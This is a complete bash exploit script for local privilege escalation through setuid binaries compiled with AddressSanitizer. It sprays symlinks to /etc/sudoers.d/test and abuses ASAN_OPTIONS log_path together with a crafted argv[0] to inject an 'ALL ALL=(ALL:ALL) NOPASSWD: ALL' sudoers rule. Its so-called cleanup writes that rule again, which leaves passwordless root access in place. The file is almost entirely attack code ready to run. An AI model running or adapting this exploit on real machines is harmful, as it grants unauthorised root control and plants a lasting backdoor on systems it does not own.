#!/bin/bash
target="${1}"
log_prefix="hello"
spray_size=300

# Verify runtime
if [[ $# -eq 0 ]] ; then
    echo " USAGE: $0 ./asan-suid"
    exit 0
fi

if ! command -v gcc; then
  echo '[-] gcc command not found'
  exit 1
fi

if ! test -u "${target}"; then
  echo "[-] ${target} is not setuid binary"
  exit 1
fi

if [[ $(ASAN_OPTIONS="help=1" "${target}" 2>&1) =~ "AddressSanitizer" ]]; then
  echo "[+] ${target} was compiled with libasan"
else
  echo "[!] ${target} was compiled without libasan"
  exit 1
fi

echo "[*] compiling spray.c"

cat << EOF > "spray.c"
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
int main(void)
{
  pid_t pid = getpid();
  char buf[64];
  for (int i=0; i<=${spray_size}; i++) {
    snprintf(buf, sizeof(buf), "${log_prefix}. \t\nALL ALL=(ALL:ALL) NOPASSWD: ALL \t\n.%ld", (long)pid - ${spray_size}/2 +i);
    symlink("/etc/sudoers.d/test", buf);
  }
}
EOF

gcc "spray.c" -o "spray"
rm -f "spray.c"

echo "[*] spraying pwd..."

rm $log_prefix* >/dev/null 2>&1
(mkdir -p tests && cd tests/ && ../spray )

echo "[*] running exploit..."

bash -c 'IFS="\n" ASAN_OPTIONS="log_path=./tests/'${log_prefix}' verbosity=2 log_exe_name=1" exec -a "${IFS}ALL ALL=(ALL:ALL) NOPASSWD: ALL${IFS}" "'${target}'"'

sudo -n id
if [ $? -ne 0 ]; then
  echo "[-] sudo -n failed"
  exit 1
fi

echo "[+] exploit succeeded"

echo "[*] cleanup..."

cat <<EOF | sudo tee /etc/sudoers.d/test 2>&1 >/dev/null
ALL ALL=(ALL:ALL) NOPASSWD: ALL
EOF

cat <<EOF | sudo bash
/bin/rm -f tests/$log_prefix*
/bin/rm -vf spray
EOF